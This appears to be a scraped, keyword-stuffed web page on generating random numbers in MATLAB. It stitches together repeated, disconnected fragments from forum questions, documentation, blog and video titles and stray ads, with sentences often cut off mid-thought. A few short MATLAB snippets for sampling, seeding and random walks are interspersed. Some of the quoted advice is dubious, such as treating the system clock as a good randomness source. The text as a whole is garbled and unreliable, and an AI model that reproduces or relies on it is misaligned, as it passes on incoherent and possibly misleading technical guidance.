{"ft_lang_label":"__label__en","ft_lang_prob":0.8469637,"math_prob":0.97768664,"size":52470,"snap":"2019-51-2020-05","text_gpt3_token_len":11020,"char_repetition_ratio":0.25304008,"word_repetition_ratio":0.25434273,"special_character_ratio":0.20747094,"punctuation_ratio":0.10646663,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99677813,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-07T17:05:50Z\",\"WARC-Record-ID\":\"<urn:uuid:043858bf-ba57-4d6a-81b9-0a5437db7042>\",\"Content-Length\":\"61059\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2fb472e1-940a-49a0-b4e1-a20d67d88478>\",\"WARC-Concurrent-To\":\"<urn:uuid:380060ca-4e0e-4c28-809e-7466c468952f>\",\"WARC-IP-Address\":\"41.185.8.138\",\"WARC-Target-URI\":\"http://pharmaqforms.co.za/o6rf80n/random-generators-matlab.php\",\"WARC-Payload-Digest\":\"sha1:EGOPCIANSLAHSCIUMTQLNWJWFQ3TS73N\",\"WARC-Block-Digest\":\"sha1:2DCYDUOD5WQN3JOM22ZZBVMVIBWL3RJR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540500637.40_warc_CC-MAIN-20191207160050-20191207184050-00262.warc.gz\"}"}
https://physics.stackexchange.com/feeds/question/186992
[ "Questions concerning BCS theory (particularly the \"pairing Hamiltonian\") - Physics Stack Exchange most recent 30 from physics.stackexchange.com 2019-09-17T14:50:09Z https://physics.stackexchange.com/feeds/question/186992 https://creativecommons.org/licenses/by-sa/4.0/rdf https://physics.stackexchange.com/q/186992 1 Questions concerning BCS theory (particularly the \"pairing Hamiltonian\") ApproximatelyTrue https://physics.stackexchange.com/users/81055 2015-05-31T15:49:00Z 2016-02-18T01:25:29Z <p>I've been reading up about the BCS theory of superconductivity, and the treatments I've seen begin rather mysteriously with a Hamiltonian that (in the language of second quantization) looks something like this: $$\\mathcal{H}=\\sum_{\\vec k\\sigma}\\xi_{\\vec k}c_{\\vec k\\sigma}^{\\dagger}c_{\\vec k\\sigma}+\\sum_{\\vec k\\vec l}g_{\\vec k\\vec l}c_{\\vec k\\uparrow}^{\\dagger}c_{-\\vec k\\downarrow}^{\\dagger}c_{-\\vec l\\downarrow}c_{\\vec l\\uparrow},$$ where $\\sigma \\in \\{\\uparrow,\\downarrow\\}$ labels possible spin states of an electron, $c_{\\vec k\\sigma}^{\\dagger}$(respectively $c_{\\vec k\\sigma}$) creates (respectively annihilates) an electron of momentum $\\vec k$, $\\xi_{\\vec k}\\equiv\\epsilon_{\\vec k}-\\mu$ is the kinetic energy of an electron of momentum $\\vec k$ measured relative to the chemical potential $\\mu$ and $g_{\\vec k,\\vec l}$ is the coupling strength of a (phonon mediated) interaction between an electron of momentum $\\vec k$ and an electron of momentum $\\vec l$.</p> <p>Now the first, \"kinetic\" term represents the kinetic energy of the electrons after accounting for the band structure, and I think I understand it alright. I have some doubts regarding the second \"interaction\" term.</p> <ol> <li>How do we compute $g_{\\vec k,\\vec l}$? Are there models which allow us to explicitly see how properties of the lattice (e.g. isotope mass) affect the strength of the interaction? Or do we simply extract it from experimental measurements?</li> <li>I'm relatively new to the language of second quantization, so could someone explain to me why this sequence of creation and annihilation operators (in this particular order) describes a phonon mediated interaction between an electron of momentum $\\vec k$ and an electron of momentum $\\vec l$?</li> <li>It seems like we're only including terms corresponding to interactions between pairs which have total spin 0. (Am I reading this term wrong somehow?) Why can't we have spin-1 quasiparticles condensing into a charge carrying \"superfluid\" ground state?</li> </ol> https://physics.stackexchange.com/questions/186992/-/186996#186996 1 Answer by akhmeteli for Questions concerning BCS theory (particularly the \"pairing Hamiltonian\") akhmeteli https://physics.stackexchange.com/users/6974 2015-05-31T16:16:04Z 2015-05-31T16:16:04Z <ol> <li>The BCS Hamiltonian is derived from a Hamiltonian describing, in particular, electron-phonon interaction. I read the (rather cumbersome) derivation in A.S. 
Davydov's \"Quantum Mechanics\", but I am sure it can be found in many other places.</li> </ol> https://physics.stackexchange.com/questions/186992/-/238031#238031 1 Answer by JakeA for Questions concerning BCS theory (particularly the \"pairing Hamiltonian\") JakeA https://physics.stackexchange.com/users/104887 2016-02-18T01:25:29Z 2016-02-18T01:25:29Z <p>It might make more sense to address your questions in non-numerical order.</p> <p>To answer your second question, this isn't an interaction between an electron with momentum $k$ and another with momentum $l$. It describes the scattering of two electrons with opposite spin and momenta $\\pm l$ to momenta $\\pm k$. You destroy an up electron with momentum $l$ and a down electron with momentum $-l$ and create an up electron with momentum $k$ and a down electron with momentum $-k$.</p> <p>Addressing your third question, this model is based upon the assumption that the electrons pair with opposite momentum and opposite spin. That is, that the Cooper pair has a net spin of zero and a net momentum of zero. This does not necesarily have to be the case, but was assumed to be the case in BCS theory. There are a few justifications for making this initial assumption:</p> <ol> <li><p>Typical phonon energies are much smaller than the Fermi energy. This means that an iteraction with a phonon will only scatter electrons within a thin shell around the Fermi-surface. If you imagine two rings. Their overlap is greatest when they are centred on each other and rapidly decreases as they are seperated. The cross-section for interaction with phonons is large if the momentum is zero.</p></li> <li><p>If you are looking for a lowest energy configuration, the zero-momentum and zero-spin case seems like a sensible start.</p></li> </ol> <p>As for the form of $g_{kl}$, there isn't an all-encompasing theory in the same way that we can calculate band structures very accurately from atomic positions. There are, of course, theories for calculating general coupling strengths. Eliashberg theory, in brief, takes the electronic and phononic densities and computes a coupling strength based upon the probabilites of scattering from one electronic state to another via a phonon.</p> <p>You need to look further into triplet pairing and p-wave superconductivity to hear more about spin-1 pairs. Its a hugely active area of research and I think it is fair to say that the jury is out on whether it is actually realised in the candidate materials.</p>" ]
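A one-line second-quantization check (added here as an illustration; it is standard operator algebra rather than part of the original thread) makes JakeA's reading of the quartic term concrete: acting on a single pair state with momenta ±l, the term simply moves the pair to ±k (assuming k ≠ l), which is exactly the pair-scattering picture described above.

```latex
% Action of one term of the BCS interaction on a single Cooper-pair state.
% Assumes k != l: the pair at (+l up, -l down) is destroyed and re-created at (+k up, -k down).
\[
  c_{\vec k\uparrow}^{\dagger}\, c_{-\vec k\downarrow}^{\dagger}\,
  c_{-\vec l\downarrow}\, c_{\vec l\uparrow}
  \left( c_{\vec l\uparrow}^{\dagger}\, c_{-\vec l\downarrow}^{\dagger} \lvert 0 \rangle \right)
  = c_{\vec k\uparrow}^{\dagger}\, c_{-\vec k\downarrow}^{\dagger} \lvert 0 \rangle .
\]
```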
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8367689,"math_prob":0.935606,"size":5404,"snap":"2019-35-2019-39","text_gpt3_token_len":1355,"char_repetition_ratio":0.124814816,"word_repetition_ratio":0.06267806,"special_character_ratio":0.25166544,"punctuation_ratio":0.101123594,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9958643,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-17T14:50:09Z\",\"WARC-Record-ID\":\"<urn:uuid:2c803f90-58d1-48fb-8146-96b72b01ea95>\",\"Content-Length\":\"8850\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5a1beb04-9fa2-4393-aa2e-e27b08947f23>\",\"WARC-Concurrent-To\":\"<urn:uuid:a1c328ba-0aec-438d-ac39-87d374b03d77>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://physics.stackexchange.com/feeds/question/186992\",\"WARC-Payload-Digest\":\"sha1:UW7F4TBRGC7T3W45THGJJHX2IY4FYSZ2\",\"WARC-Block-Digest\":\"sha1:U3EJWMDMOWPZXLB3QNGBNV6W62P65KU6\",\"WARC-Identified-Payload-Type\":\"application/atom+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514573080.8_warc_CC-MAIN-20190917141045-20190917163045-00266.warc.gz\"}"}
http://www.romannumerals.co/numerals-converter/mcmxcii-in-numbers/
[ "## What number is \"MCMXCII\"?\n\n### A: 1992\n\nMCMXCII = 1992\n\nYour question is, \"What is MCMXCII in Numbers?\". The answer is '1992'. Here we will explain how to convert, write and read the Roman numeral letters MCMXCII in the correct Arabic number translation.\n\n## How is MCMXCII converted to numbers?\n\nTo convert MCMXCII to numbers the translation involves breaking the numeral into place values (ones, tens, hundreds, thousands), like this:\n\nPlace ValueNumberRoman Numeral\nConversion1000 + 900 + 90 + 2M + CM + XC + II\nThousands1000M\nHundreds900CM\nTens90XC\nOnes2II\n\n## How is MCMXCII written in numbers?\n\nTo write MCMXCII as numbers correctly you combine the converted roman numerals together. The highest numerals should always precede the lower numerals to provide you the correct written translation, like in the table above.\n\n1000+900+90+2 = (MCMXCII) = 1992\n\n## More from Roman Numerals.co\n\nMCMXCIII\n\nNow you know the translation for Roman numeral MCMXCII into numbers, see the next numeral to learn how it is conveted to numbers.\n\nConvert another Roman numeral in to Arabic numbers." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7846369,"math_prob":0.95352703,"size":1098,"snap":"2023-40-2023-50","text_gpt3_token_len":312,"char_repetition_ratio":0.18190128,"word_repetition_ratio":0.0,"special_character_ratio":0.2641166,"punctuation_ratio":0.11,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96551704,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-03T23:48:10Z\",\"WARC-Record-ID\":\"<urn:uuid:5f65b473-a911-43a5-9e93-b8a2addae8df>\",\"Content-Length\":\"76085\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3b871825-2223-4ee6-9e01-dc1e5e35ac07>\",\"WARC-Concurrent-To\":\"<urn:uuid:4f1fb06a-f4f5-4c59-b86f-91380aa58ea8>\",\"WARC-IP-Address\":\"162.210.102.46\",\"WARC-Target-URI\":\"http://www.romannumerals.co/numerals-converter/mcmxcii-in-numbers/\",\"WARC-Payload-Digest\":\"sha1:IMBJCN5SR25BJ7RTOQJVWYTD7GIDNHJ2\",\"WARC-Block-Digest\":\"sha1:BMOENSTJJIBEWB6SZMJF76PNV2PEJWSL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100518.73_warc_CC-MAIN-20231203225036-20231204015036-00694.warc.gz\"}"}
https://www.chegg.com/homework-help/changing-order-integration-spherical-coordinates-previous-in-chapter-15.7-problem-29e-solution-9780321730787-exc
[ "Skip Navigation", null, "# Thomas' Calculus, Early Transcendentals, Books a la Carte Edition (12th Edition) Edit edition Problem 29E from Chapter 15.7: Changing the Order of Integration in Spherical Coordinates ...\n\nWe have solutions for your book!\nChapter: Problem:\n\nChanging the Order of Integration in Spherical Coordinates\n\nThe previous integrals suggest there are preferred orders of integration for spherical coordinates, but other orders give the same value and are occasionally easier to evaluate. Evaluate the integrals in Exercise", null, "Step-by-step solution:\n75%(8 ratings)\nfor this solution\nChapter: Problem:\n• Step 1 of 3\n\nThe integral is", null, ".\n\nThe objective is to evaluate the integral by changing the order of integration.\n\nSince the limits of integration are constants, the other order of integration gives the same value.", null, "", null, "• Chapter , Problem is solved.\nCorresponding Textbook", null, "Thomas' Calculus, Early Transcendentals, Books a la Carte Edition | 12th Edition\n9780321730787ISBN-13: 032173078XISBN:\nThis is an alternate ISBN. View the primary ISBN for: Thomas' Calculus Early Transcendentals 12th Edition Textbook Solutions" ]
[ null, "https://cs.cheggcdn.com/covers2/20500000/20500993_1307601438_Width200.jpg", null, "https://mgh-images.s3.amazonaws.com/9780321998002/508937-15.7-29EEI1.png", null, "https://chegg-html-solutions.s3.amazonaws.com/9780321884077/13217-15.7-29E-i1.png", null, "https://chegg-html-solutions.s3.amazonaws.com/9780321884077/13217-15.7-29E-i2.png", null, "https://chegg-html-solutions.s3.amazonaws.com/9780321884077/13217-15.7-29E-i3.png", null, "https://cs.cheggcdn.com/covers2/20500000/20500993_1307601438_Width200.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8774611,"math_prob":0.9021373,"size":563,"snap":"2019-13-2019-22","text_gpt3_token_len":103,"char_repetition_ratio":0.18962432,"word_repetition_ratio":0.09756097,"special_character_ratio":0.1793961,"punctuation_ratio":0.114583336,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95470065,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,null,null,1,null,1,null,1,null,1,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-24T11:03:58Z\",\"WARC-Record-ID\":\"<urn:uuid:5927da64-9c2d-4d1d-b7f5-b3f26fcf0403>\",\"Content-Length\":\"252492\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b955e98c-9cb6-4782-b554-0e96b35cf483>\",\"WARC-Concurrent-To\":\"<urn:uuid:dc160076-8780-4ba8-9dc4-c9ef0780d357>\",\"WARC-IP-Address\":\"52.84.129.246\",\"WARC-Target-URI\":\"https://www.chegg.com/homework-help/changing-order-integration-spherical-coordinates-previous-in-chapter-15.7-problem-29e-solution-9780321730787-exc\",\"WARC-Payload-Digest\":\"sha1:HKYI4NOURJWRCK22TD3FTPELGRMY3IEK\",\"WARC-Block-Digest\":\"sha1:SKG6HWCWP5P3YAWY2FPS6XPW725R7RBN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232257605.76_warc_CC-MAIN-20190524104501-20190524130501-00130.warc.gz\"}"}
https://math.stackexchange.com/questions/3338738/minimum-and-maximum-sum-of-squares-given-constraints
[ "# Minimum and maximum sum of squares given constraints\n\nSay that we know that $$\\sum_{i=1}^n x_i = x_1+x_2+...+x_n = 1$$ for some positive integer $$n$$, with $$x_1 \\le x_2 \\le x_3 \\le ... \\le x_n$$. The values of $$x_1$$ and $$x_n$$ are also known. How can the minimum and maximum values of $$\\sum_{i=1}^n x_i^2$$ be found?\n\nMy attempt:\n\nI found the minimum value by setting all the $$x_i$$ other than $$x_1$$ and $$x_n$$ equal to each other. This means that $$(n-2)x_i + x_1 + x_n = 1 \\rightarrow x_i = \\frac{1-x_1-x_n}{n-2}$$. Therefore, $$\\sum_{i=1}^n x_i^2 = \\frac{(1-x_1-x_n)^2}{n-2}+x_1^2+x_n^2$$\n\nHowever, I do not know how to find the maximum. The hard part is that $$x_1 \\le x_i \\le x_n$$ must be satisfied.\n\n• $x_1$ and $x_n$ are known and fixed. Aug 30, 2019 at 4:06\n• by the maximum principle, the maximum of a convex function over a bounded polyhedral set occurs at an extreme point of that set Sep 4, 2019 at 6:20\n• In 1981 Slater has proved an interesting companion inequality to Jensen’s inequality. Theorem : Suppose that $\\phi:I\\subseteq \\mathbb{R} \\to \\mathbb{R}$ is increasing convex function on interval $I$ for $x_1$,$x_2$,$\\cdots$,$x_n$ $\\in$ $I^{°}$ (where $I^{°}$ is the interior of the interval $I$) and for $p_1$,$p_2$,$\\cdots$,$p_n$$\\geq 0 withP_n=\\sum_{i=1}^{n}p_i>0 if \\sum_{i=1}^{n}p_i\\phi'_{+}(x_i)>0, then :$$\\frac{1}{P_n}\\sum_{i=1}^{n}p_i\\phi(x_i)\\leq\\phi\\Big(\\frac{\\sum_{i=1}^{n}p_i\\phi'_{+}(x_i)x_i}{\\sum_{i=1}^{n}p_i\\phi'_{+}(x_i)}\\Big)$$Sep 6, 2019 at 12:22 ## 2 Answers For the maximum: Suppose we have fixed values $$x_1 \\leq \\frac{1}{n}$$ and $$x_n \\geq \\frac{1}{n}$$. Then there is a unique point $$x^*=(x_1, x_2, \\dots, x_n)$$ satisfying $$\\sum x_i=1$$ with at most one index $$j$$ satisfying $$x_1 < x_j < x_n$$ (imagine starting with all the variables equal to $$x_1$$, then increasing them one by one to $$x_n$$). I claim this is where the unique maximum of your function is. Consider any other point in the domain, and suppose it has $$x_1 for some $$i \\neq j$$. Let $$\\epsilon = \\min\\{x_i-x_1, x_n-x_j\\}$$. Replacing $$x_i$$ by $$x_i'=x_i-\\epsilon$$ and $$x_j$$ by $$x_j'=x_j+\\epsilon$$ maintains the $$\\sum x_i=1$$ constraint, while decreasing the number of \"interior to $$(x_1, x_n)$$\" variables by one. Furthermore, the new point is better for our objective function: In the sum of squares objective we've replaced $$x_i^2+x_j^2$$ by $$x_i'^2+x_j'^2=(x_i-\\epsilon)^2+(x_j+\\epsilon)^2 = x_i^2+x_j^2 + 2 \\epsilon^2 + 2 \\epsilon(x_j-x_i) > x_i^2+x_j^2.$$ Repeatedly following this process, we'll eventually reach the point $$x^*$$ from our arbitrary point, increasing the objective at every step. The key idea hiding in the background here is that (as Michael Rozenberg noted) the function $$x^2$$ is convex. So if we want to maximize $$\\sum x_i^2$$ given a fixed $$\\sum x_i$$, we want to push the variables as far away from each other as possible. The $$x_1$$ and $$x_n$$ constraints place limits on this, so effectively what ends up happening is we push points out to the boundary until we can't push them out any further. The minimum you observed is the reverse of this: To minimize the sum of a convex function for fixed $$\\sum x_i$$ we push all the inputs together as much as possible (this corresponds to Jensen's Inequality). • Nice argument, very clear. Thanks! – user169852 Sep 7, 2019 at 23:42 • I'm not sure I understand this correctly - does this mean that all$x_i$will be equal to$x_1$or$x_n$except for one? 
Sep 17, 2019 at 1:13 • @automaticallyGenerated Yes. Exactly how many are equal to$x_1$will depend on where$1$is located relative to$nx_1$and$nx_n$. Sep 17, 2019 at 6:12 $$f(x)=x^2$$ is a convex function. Also, $$(x_1+x_2+...+x_{n-1}-(n-2)x_1,x_1,...,x_1)\\succ(x_{n-1},x_{n-2},...,x_1)$$ and let $$x_n\\geq x_1+x_2+...+x_{n-1}-(n-2)x_1.$$ Thus, by Karamata $$(x_1+x_2+...+x_{n-1}-(n-2)x_1)^2+x_1^2+...+x_1^2\\geq x_{n-1}^2+...+x_1^2,$$ which gives $$\\max\\sum_{k=1}^nx_k^2=(n-2)x_1^2+x_n^2+(1-x_n-(n-2)x_1)^2.$$ Id est, it's enough to solve our problem for $$x_1\\leq x_n or $$x_1\\leq x_n<\\frac{1-(n-2)x_1}{2}.$$ I hope it will help. The minimum we can get by C-S: $$\\sum_{k=1}^nx_k^2=x_1^2+x_n^2+\\frac{1}{n-2}\\sum_{k=1}^{n-2}1^2\\sum_{k=2}^{n-1}x_k^2\\geq x_1^2+x_n^2+\\frac{1}{n-2}\\left(\\sum_{k=2}^{n-1}x_k\\right)^2=$$ $$=x_1^2+x_n^2+\\frac{(1-x_1-x_n)^2}{n-2}.$$ The equality occurs for $$x_2=...=x_{n-1}=\\frac{1-x_1-x_n}{n-2},$$ which says that we got a minimal value. • The Karamata solution is cool, but does it satisfy$x_{n-1} \\leq x_n$? If I'm reading the solution right, we have$x_{n-1} = 1 - x_n - (n-2)x_1$. Is this always$\\leq x_n\\$?\n– user169852\nAug 30, 2019 at 5:07\n• @Bungo I see now. There is a problem with occurring of the equality. Aug 30, 2019 at 5:44" ]
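The extremal configurations described in both answers are easy to check numerically. The short Python sketch below is an illustration added here (not part of the original thread; the helper names are ours): it builds the boundary configuration for the maximum and the equal-middle configuration for the minimum, then compares them against random feasible points.

```python
import random

def min_config(x1, xn, n):
    # All middle entries equal: the Jensen / Cauchy-Schwarz minimiser.
    mid = (1 - x1 - xn) / (n - 2)
    return [x1] + [mid] * (n - 2) + [xn]

def max_config(x1, xn, n):
    # Push middle entries to the bounds x1 or xn, leaving at most one interior value.
    xs = [x1] * (n - 1) + [xn]
    remaining = 1 - sum(xs)
    for i in range(1, n - 1):          # raise middle entries one by one up to xn
        step = min(remaining, xn - x1)
        xs[i] += step
        remaining -= step
    return xs

def sum_sq(xs):
    return sum(x * x for x in xs)

n, x1, xn = 6, 0.05, 0.4
lo, hi = min_config(x1, xn, n), max_config(x1, xn, n)
print(round(sum(lo), 10), round(sum(hi), 10))   # both sum to 1
for _ in range(10000):                          # random feasible points never beat the extremes
    mid = [random.uniform(x1, xn) for _ in range(n - 2)]
    scale = (1 - x1 - xn) / sum(mid)
    pt = [x1] + [m * scale for m in mid] + [xn]
    if not all(x1 - 1e-9 <= m <= xn + 1e-9 for m in pt):
        continue                                # rescaling can leave the box; skip those draws
    assert sum_sq(lo) - 1e-9 <= sum_sq(pt) <= sum_sq(hi) + 1e-9
```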
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85531145,"math_prob":1.0000063,"size":1739,"snap":"2023-40-2023-50","text_gpt3_token_len":522,"char_repetition_ratio":0.10201729,"word_repetition_ratio":0.0,"special_character_ratio":0.30879816,"punctuation_ratio":0.081871346,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000098,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-28T01:42:34Z\",\"WARC-Record-ID\":\"<urn:uuid:6de472bd-77f6-4739-8cd5-901d857357ce>\",\"Content-Length\":\"164380\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d8b01dd6-c3e8-4820-b16d-2764f71156b1>\",\"WARC-Concurrent-To\":\"<urn:uuid:6f53b66e-a8b1-40ad-af79-30e778617874>\",\"WARC-IP-Address\":\"104.18.11.86\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/3338738/minimum-and-maximum-sum-of-squares-given-constraints\",\"WARC-Payload-Digest\":\"sha1:AEJFGY3APYTSK6K3JGYVOVIATC4NFAGJ\",\"WARC-Block-Digest\":\"sha1:KDY3UZI6LIBFYIQOYLT5W6EKL4UZED27\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510334.9_warc_CC-MAIN-20230927235044-20230928025044-00786.warc.gz\"}"}
http://ecoursesbook.com/cgi-bin/ebook.cgi?topic=me&chap_sec=07.5&page=theory
[ "", null, "Ch 7. Stress Analysis Multimedia Engineering Mechanics PlaneStress PrincipalStresses Mohr's Circlefor Stress Failure PressureVessels\n Chapter 1. Stress/Strain 2. Torsion 3. Beam Shr/Moment 4. Beam Stresses 5. Beam Deflections 6. Beam-Advanced 7. Stress Analysis 8. Strain Analysis 9. Columns Appendix Basic Math Units Basic Equations Sections Material Properties Structural Shapes Beam Equations Search eBooks Dynamics Fluids Math Mechanics Statics Thermodynamics Author(s): Kurt Gramoll ©Kurt Gramoll", null, "MECHANICS - THEORY\n\nThin-walled Pressure Vessels", null, "Cylindrical Pressure Vessel with\nInternal Pressure\n\nBoth cylinderical and spherical pressure vessels are common structures that are used ranging from large gas storage structures to small compressed air tanks in industrial equipment. In this section, only thin-walled pressure vessels will be analyzed.\n\nA pressure vessel is assumed to be thin-walled if the wall thickness is less than 10% of the radius (r/t > 10). This condition assumes that the pressure load will be transfered into the shell as pure tension (or compression) without any bending. Thin-walled pressure vessels are also known as shell structures and are efficient storage structures.\n\nIf the outside pressure is greater than the inside pressure, the shell could also fail due to buckling. This is an advanced topic and is not considered in this section.\n\nCylindrical Pressure Vessels", null, "Cylindrical Vessels will Expierence\nBoth Hoop and Axial Stress in\nthe Mid-section\n\nOnly the middle cylindrical section of a cylinder pressure vessel is examined in this section. The joint between the end caps and the mid-section will have complex stresses that are beyond the discussion in this chapter.\n\nIn the mid-section, the pressure will cause the vessel to expand or strain in only the axial (or longitudinal) and the hoop (or circumferential) directions. There will be no twisting or shear strains. Thus, there will only be the hoop stress, σh and the axial stress, σa. as shown in the diagram at the left.", null, "Cross Section Cut of\nCylindrical Vessel\n\nPressure vessels can be analyzed by cutting them into two sections, and then equating the pressure load at the cut with the stress load in the thin walls. In the axial direction, the axial pressure from the discarded sections will produce a total axial force of p(πr2) which is simply the cross section area times the internal pressure. It is generally assumed that r is the inside radius.\n\nThe axial force is resisted by the axial stress in the vessel walls which have a thickness of t. The total axial load in the walls will be σa(2πrt). Since the cross section is in equilbrium, the two axial forces must be equal, giving\n\np(πr2) = σa(2πrt)\n\nThis can be simplified to", null, "where r is the inside radius and t is the wall thickness.", null, "Hoop Section Cut from\nCylindrical Vessel\n\nIn addition to the axial stress, there will be a hoop stress around the circumference. The hoop stress, σh, can be determined by taking a vertical hoop section that has a width of dx. The total horizontal pressure load pushing against the section will be p(2r dx) as shown in the diagram.\n\nThe top and bottom edge section will resist the pressure and exert a load of σh(t dx) (each edge). 
The edge loads have to equal the pressure load, or\n\np(2r dx) =σh(2t dx)\n\nThis can be simplified to", null, "where r is the inside radius and t is the wall thickness.\n\nSpherical Pressure Vessel", null, "Spherical Pressure Vessel\nCut in Half\n\nA spherical pressure vessel is really just a special case of a cylinderical vessel. No matter how the a sphere is cut in half, the pressure load perpendicular to the cut must equal the shell stress load. This is the same situation with the axial direction in a cylindrical vessel. Equating the to loads give,\n\np(πr2) = σh(2πrt)\n\nThis can be simplified to", null, "Notice, the hoop and axial stress are the same due to symmetry.\n\nPractice Homework and Test problems now available in the 'Eng Mechanics' mobile app\nIncludes over 400 problems with complete detailed solutions.\nAvailable now at the Google Play Store and Apple App Store." ]
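As a quick numerical illustration of the formulas above (this sketch and its numbers are ours, not part of the original page), the following Python function evaluates the axial and hoop stresses for a thin-walled cylinder and checks the r/t > 10 assumption:

```python
def thin_wall_cylinder_stresses(p, r, t):
    """Axial and hoop stress in a thin-walled cylindrical pressure vessel.

    p: internal gauge pressure (Pa), r: inside radius (m), t: wall thickness (m).
    """
    if r / t <= 10:
        raise ValueError("Thin-wall assumption (r/t > 10) is not satisfied")
    sigma_axial = p * r / (2 * t)   # from p*(pi*r^2) = sigma_a*(2*pi*r*t)
    sigma_hoop = p * r / t          # from p*(2*r*dx) = sigma_h*(2*t*dx)
    return sigma_axial, sigma_hoop

# Example (illustrative values): 0.5 MPa internal pressure, 0.6 m inside radius, 10 mm wall.
sa, sh = thin_wall_cylinder_stresses(0.5e6, 0.6, 0.010)
print(sa / 1e6, sh / 1e6)  # 15.0 MPa axial, 30.0 MPa hoop
```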
[ null, "http://ecoursesbook.com/general/ecourses.gif", null, "http://ecoursesbook.com/general/cc_by_nc_nd.png", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/d7621.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/d7622.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/d7623.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/eq7621.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/d7624.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/eq7622.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/d7625.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/eq7623.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.893524,"math_prob":0.9445239,"size":3414,"snap":"2021-31-2021-39","text_gpt3_token_len":788,"char_repetition_ratio":0.1718475,"word_repetition_ratio":0.06467662,"special_character_ratio":0.2208553,"punctuation_ratio":0.071428575,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98265517,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,null,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-25T02:38:59Z\",\"WARC-Record-ID\":\"<urn:uuid:5eacd17f-0782-4736-a3fb-552cb12ab505>\",\"Content-Length\":\"14058\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5b9c6be5-b1c5-4fef-98c5-802841ac770b>\",\"WARC-Concurrent-To\":\"<urn:uuid:4d57e765-2d43-42c4-9769-f58baa44d8c1>\",\"WARC-IP-Address\":\"205.144.171.156\",\"WARC-Target-URI\":\"http://ecoursesbook.com/cgi-bin/ebook.cgi?topic=me&chap_sec=07.5&page=theory\",\"WARC-Payload-Digest\":\"sha1:FM77I2GNKSKXCD27XI245S7JCBVSZMGV\",\"WARC-Block-Digest\":\"sha1:BA2YYZXCNONKSZXK4DEOEFXIC7DXANFB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057589.14_warc_CC-MAIN-20210925021713-20210925051713-00027.warc.gz\"}"}
https://discuss.mxnet.apache.org/t/nlp-prediction-using-a-cnn-pretrained-model/280
